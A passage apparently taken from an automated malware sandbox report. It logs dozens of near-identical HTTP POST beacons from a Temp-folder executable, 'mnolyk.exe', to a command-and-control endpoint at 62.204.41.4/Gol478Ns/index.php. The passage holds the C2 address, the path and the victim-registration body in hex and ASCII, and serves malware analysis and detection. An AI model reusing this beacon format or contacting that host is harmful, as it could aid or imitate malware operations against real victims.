                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.045377970 CET571INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            383192.168.2.45007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:15.231604099 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.295681000 CET572INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            384192.168.2.45007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:15.474750996 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.537436008 CET573INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            385192.168.2.45008062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:15.721318960 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:15.783492088 CET574INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            386192.168.2.45008162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:15.969624043 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.033631086 CET575INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            387192.168.2.45008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:16.214185953 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.280766010 CET576INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            388192.168.2.45008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:16.450190067 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.513186932 CET577INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            389192.168.2.45008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:16.684237003 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:16.747688055 CET578INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.44973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:36.292012930 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.357598066 CET228INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            390192.168.2.45008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:16.942706108 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.006316900 CET579INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            391192.168.2.45008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:17.186332941 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.251060963 CET580INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            392192.168.2.45008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:17.420202971 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.484596014 CET581INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            393192.168.2.45008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:17.657423973 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.721311092 CET582INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            394192.168.2.45008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:17.910351038 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:17.974165916 CET583INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            395192.168.2.45009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:18.150814056 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.215178967 CET584INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            396192.168.2.45009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:18.399399042 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.464189053 CET585INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            397192.168.2.45009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:18.634985924 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.697040081 CET586INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            398192.168.2.45009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:18.875583887 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:18.939227104 CET587INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            399192.168.2.45009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:19.127295971 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:19.192943096 CET588INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.44969962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:25.386825085 CET193OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.449558973 CET193INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.44973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:36.528446913 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:36.591797113 CET229INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            400192.168.2.45009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:19.370464087 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
